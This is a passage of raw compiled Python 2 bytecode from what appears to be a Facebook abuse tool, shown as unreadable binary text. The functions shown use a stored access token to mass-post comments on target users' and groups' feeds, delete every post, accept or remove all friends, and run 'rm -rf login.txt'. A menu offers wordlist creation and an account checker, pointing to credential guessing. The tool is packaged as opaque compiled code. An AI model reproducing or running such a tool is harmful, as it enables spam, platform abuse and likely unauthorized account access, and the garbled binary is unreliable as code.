2\x00t\t\x00d\n\x00\x83\x01\x00}\x03\x00|\x02\x00j\n\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x02\x00y\xe9\x00t\x0b\x00j\x0c\x00d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x03\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00t\x10\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHxk\x00|\x05\x00d\x13\x00\x19d\x14\x00\x19D][\x00}\x06\x00|\x06\x00d\x15\x00\x19}\x07\x00t\x11\x00j\x12\x00|\x07\x00\x83\x01\x00\x01t\x0b\x00j\x13\x00d\r\x00|\x07\x00\x17d\x16\x00\x17|\x02\x00\x17d\x17\x00\x17|\x00\x00\x17\x
83\x01\x00\x01d\x18\x00|\x02\x00d\x19\x00 j\n\x00d\x0c\x00d\x1a\x00\x83\x02\x00\x17d\x1b\x00\x17GHq\x07\x01Wd\x11\x00d\x12\x00\x14GHd\x1c\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01Wn\'\x00\x04t\x17\x00k\n\x00r\xbf\x01\x01\x01\x01d\x1e\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m\'<>\' \x1b[1;92mfor new liness,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mComment \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x02\x00\x00\x00<>s\x01\x00\x00\x00\ns\x1b\x00\x00\x00https://graph.facebook.com/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x12\x00\x00\x00/comments?message=s\x0e\x00\x00\x00&access_token=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00R%\x01\x00\x00s\x0c\x00\x00\x00... \x1b[1;92m]s\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\x1b[1;91m[!] 
ID not found(\x18\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x16\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00komenR\x94\x00\x00\x00Rh\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00R,\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00t\x02\x00\x00\x00kmR(\x01\x00\x00R\xf1\x00\x00\x00Rm\x00\x00\x00R\xa2\x00\x00\x00t\x01\x00\x00\x00f(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x14\x01\x00\x00\xfc\x07\x00\x00sB\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x12\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01!\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\n\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s,\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00t\t\x00d\t\x00\x83\x01\x00}\x02\x00t\t\x00d\n\x00\x83\x01\x00}\x03\x00|\x02\x00j\n\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x02\x00y>\x00t\x0b\x00j\x0c\x00d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00d\x0f\x00|\x05\x00d\x10\x00\x19\x17GHWn\'\x00\x04t\x10\x00k\n\x00r\x14\x01\x01\x01\x01d\x11\x00GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xy\xe9\x00t\x0b\x00j\x0c\x00d\x13\x00|\x01\x00\x17d\x14\x00\x17|\x03\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\r\x00j\x0e\x00|\x06\x00j\x0f\x00\x83\x01\x00}\x07\x00t\x12\x00d\x16\x00\x83\x01\x00\x01d\x17\x0
0d\x18\x00\x14GHxk\x00|\x07\x00d\x19\x00\x19d\x1a\x00\x19D][\x00}\x08\x00|\x08\x00d\x1b\x00\x19}\t\x00t\x13\x00j\x14\x00|\t\x00\x83\x01\x00\x01t\x0b\x00j\x15\x00d\x1c\x00|\t\x00\x17d\x1d\x00\x17|\x02\x00\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x1e\x00|\x02\x00d\x1f\x00 j\n\x00d\x0c\x00d \x00\x83\x02\x00\x17d!\x00\x17GHqo\x01Wd\x17\x00d\x18\x00\x14GHd"\x00t\x16\x00t\x17\x00t\x13\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01Wn\'\x00\x04t\x10\x00k\n\x00r\'\x02\x01\x01\x01d#\x00GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S($\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m\'<>\' \x1b[1;92mfor new liness,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mComment \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x02\x00\x00\x00<>s\x01\x00\x00\x00\ns%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s \x00\x00\x00https://graph.facebook.com/v3.0/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x12\x00\x00\x00/comments?message=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00R%\x01\x00\x00s\x0c\x00\x00\x00... \x1b[1;92m]s\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x10\x00\x00\x00\x1b[1;91m[!] 
Error(\x18\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x16\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x11\x01\x00\x00R \x00\x00\x00t\t\x00\x00\x00komengrupR\x94\x00\x00\x00Rh\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00(\n\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00R/\x01\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\xf1\x00\x00\x00Rm\x00\x00\x00R\xa2\x00\x00\x00R0\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x15\x01\x00\x00 \x08\x00\x00sR\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x12\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01!\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xf5\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01yH\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00t\x04\x00j\x05\x00d\x04\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x06\x00j\x07\x00|\x01\x00j\x08\x00\x83\x01\x00}\x02\x00|\x02\x00d\x05\x00\x19}\x03\x00Wn7\x00\x04t\t\x00k\n\x00r\x8e\x00\x01\x01\x01d\x06\x00GHt\x00\x00j\x01\x00d\x07\x00\x83\x01\x00\x01t\n\x00j\x0b\x00d\x08\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\r\x00GHd\t\x00|\x03\x00\x16GHt\x0e\x00d\n\x00\x83\x01\x00\x01d\x0b\x00d\x0c\x00\x14GHt\x04\x00j\x05\x00d\r\x00|\x00\x00\x17\x83\x01\x00}\x04\x00t\x06\x00j\x07\x00|\x04\x00j\x08\x00\x83\x01\x00}\x05\x00x\xed\x00|\x05\x00d\x0e\x00\x19D]\xe1\x00}\x06\x00|\x06\x00d\x0f\x00\x19}\x07\x00d\x10\x00}\x08\x00t\x04\x00j\x05\x00d\x11\x00|\x07\x00\x17d\x12\x00\x17|\x00\x00\x17\x83\x01\x00}\t\x00t\x06\x00j\x07\x00|\t\x00j\x08\x00\x83\x01\x00}\n\x00y3\x00|\n\x00d\x13\x00\x19d\x14\x00\x19}\x0b\x00d\
x15\x00|\x07\x00d\x16\x00 j\x0f\x00d\x17\x00d\x18\x00\x83\x02\x00\x17d\x19\x00\x17d\x1a\x00\x17GHWq\xed\x00\x04t\x10\x00k\n\x00r\xa1\x01\x01\x01\x01d\x1b\x00|\x07\x00d\x16\x00 j\x0f\x00d\x17\x00d\x18\x00\x83\x02\x00\x17d\x19\x00\x17d\x1c\x00\x17GH|\x08\x00d\x08\x007}\x08\x00q\xed\x00\x04t\x04\x00j\x11\x00j\x12\x00k\n\x00r\xcd\x01\x01\x01\x01d\x1d\x00GHt\x13\x00d\x1e\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01q\xed\x00Xq\xed\x00Wd\x0b\x00d\x0c\x00\x14GHd\x1f\x00GHt\x13\x00d\x1e\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01d\x00\x00S( \x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s)\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%ss"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mStart\x1b[1;97m ...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s0\x00\x00\x00https://graph.facebook.com/me/feed?access_token=Rl\x00\x00\x00Rj\x00\x00\x00i\x00\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x1c\x00\x00\x00?method=delete&access_token=t\x05\x00\x00\x00errort\x07\x00\x00\x00messages\x0f\x00\x00\x00\x1b[1;91m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nR%\x01\x00\x00s\x03\x00\x00\x00...s\x16\x00\x00\x00\x1b[1;91m] \x1b[1;95mFaileds\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97ms\x17\x00\x00\x00\x1b[1;92m] \x1b[1;96mDeleteds\x1b\x00\x00\x00\x1b[1;91m[!] 
Connection Errors\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mDone(\x15\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00t\t\x00\x00\x00TypeErrorRi\x00\x00\x00R\x01\x00\x00\x00R/\x00\x00\x00R\x11\x01\x00\x00(\x0c\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00namt\x03\x00\x00\x00lolRq\x00\x00\x00t\x03\x00\x00\x00asut\x04\x00\x00\x00asusR\xf1\x00\x00\x00Rj\x00\x00\x00t\x04\x00\x00\x00piroRk\x00\x00\x00t\x02\x00\x00\x00okR2\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x16\x01\x00\x00L\x08\x00\x00sJ\x00\x00\x00\x00\x01\r\x01\x03\x01\x15\x01\x13\x01\x12\x01\x0e\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\t\x01\n\x01\t\x01\x13\x01\x12\x01\x11\x01\n\x01\x06\x01\x1b\x01\x12\x01\x03\x01\x0e\x01%\x01\r\x01!\x01\r\x01\x13\x01\x05\x01\n\x01\x0f\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x91\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\n\x00j\x0b\x00d\x08\x00|\x01\x00\x17d\t\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0c\x00j\r\x00|\x02\x00j\x0e\x00\x83\x01\x00}\x03\x00d\n\x00t\x0f\x00|\x03\x00d\x0b\x00\x19\x83\x01\x00k\x06\x00r\xda\x00d\x0c\x00GHt\t\x00d\r\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01n\x00\x00t\x11\x00d\x0e\x00\x83\x01\x00\x01d\x0f\x00d\x10\x00\x14GHx~\x00|\x03\x00d\x0b\x00\x19D]r\x00}\x04\x00t\n\x00j\x12\x00d\x11\x00|\x04\x00d\x12\x00\x19d\x13\x00\x19\x17d\x14\x00\x17|\x00\x00\x17\x83\x01\x00}\x05
\x00t\x0c\x00j\r\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00d\x15\x00t\x0f\x00|\x06\x00\x83\x01\x00k\x06\x00rY\x01d\x16\x00|\x04\x00d\x12\x00\x19d\x17\x00\x19\x17GHq\xf8\x00d\x18\x00|\x04\x00d\x12\x00\x19d\x17\x00\x19\x17GHq\xf8\x00Wd\x0f\x00d\x10\x00\x14GHd\x19\x00GHt\t\x00d\r\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01d\x00\x00S(\x1a\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s3\x00\x00\x00https://graph.facebook.com/me/friendrequests?limit=s\x0e\x00\x00\x00&access_token=s\x02\x00\x00\x00[]Rl\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;91m[!] No friend requests\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s&\x00\x00\x00https://graph.facebook.com/me/friends/t\x04\x00\x00\x00fromRj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R2\x01\x00\x00s \x00\x00\x00\x1b[1;97m[ \x1b[1;91mFailed\x1b[1;97m ] R0\x00\x00\x00s \x00\x00\x00\x1b[1;97m[ \x1b[1;92mAccept\x1b[1;97m ] s\x16\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mDone(\x13\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x17\x00\x00\x00R\x11\x01\x00\x00R 
\x00\x00\x00Rh\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\x07\x01\x00\x00R\x13\x00\x00\x00t\x03\x00\x00\x00gasRm\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x17\x01\x00\x00t\x08\x00\x00s:\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x1b\x01\x12\x01\x16\x01\x05\x01\n\x01\n\x01\n\x01\t\x01\x11\x01#\x01\x12\x01\x12\x01\x14\x02\x15\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sR\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHd\t\x00d\n\x00\x14GHyt\x00t\n\x00j\x0b\x00d\x0b\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x0c\x00j\r\x00|\x01\x00j\x0e\x00\x83\x01\x00}\x02\x00xH\x00|\x02\x00d\x0c\x00\x19D]<\x00}\x03\x00|\x03\x00d\r\x00\x19}\x04\x00|\x03\x00d\x0e\x00\x19}\x05\x00t\n\x00j\x0f\x00d\x0f\x00|\x05\x00\x17d\x10\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x11\x00|\x04\x00\x17GHq\xbd\x00WWn7\x00\x04t\x10\x00k\n\x00r\x11\x01\x01\x01\x01n\'\x00\x04t\x11\x00k\n\x00r7\x01\x01\x01\x01d\x12\x00GHt\x12\x00d\x13\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xd\x14\x00GHt\x12\x00d\x13\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S(\x15\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x19\x00\x00\x00\x1b[1;97mStop \x1b[1;91mCTRL+Ci*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s*\x00\x00\x00https://graph.facebook.com/me/friends?uid=s\x0e\x00\x00\x00&access_token=s!\x00\x00\x00\x1b[1;97m[\x1b[1;92m Deleted \x1b[1;97m] s\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mDone(\x14\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x06\x00\x00\x00deletet\n\x00\x00\x00IndexErrorR\x96\x00\x00\x00R/\x00\x00\x00R\x11\x01\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00R\x0e\x01\x00\x00R}\x00\x00\x00R\x13\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x18\x01\x00\x00\x95\x08\x00\x00s<\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\n\x01\x05\x01\t\x01\x03\x01\x13\x01\x12\x01\x11\x01\n\x01\n\x01\x19\x01\x11\x01\r\x00\x03\x01\r\x01\x05\x01\n\x01\x0b\x01\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x0
0\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s1\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Create Posts5\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Create Wordlists5\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Account Checkers7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m See my group lists3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Profile Guards*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00pilih_lain(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00lain\xb7\x08\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xbb\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01n"\x00|\x00\x00d\t\x00k\x02\x00r\xab\x00t\x07\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R:\x00\x00\x00(\x08\x00\x00\x00R/\x00\x00\x00R?\x01\x00\x00t\x06\x00\x00\x00statusR\xfb\x00\x00\x00t\n\x00\x00\x00check_akunt\x08\x00\x00\x00grupsayat\x05\x00\x00\x00guardR+\x00\x00\x00(\x01\x00\x00\x00t\x05\x00\x00\x00other(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R?\x01\x00\x00\xcb\x08\x00\x00s$\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x05\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x0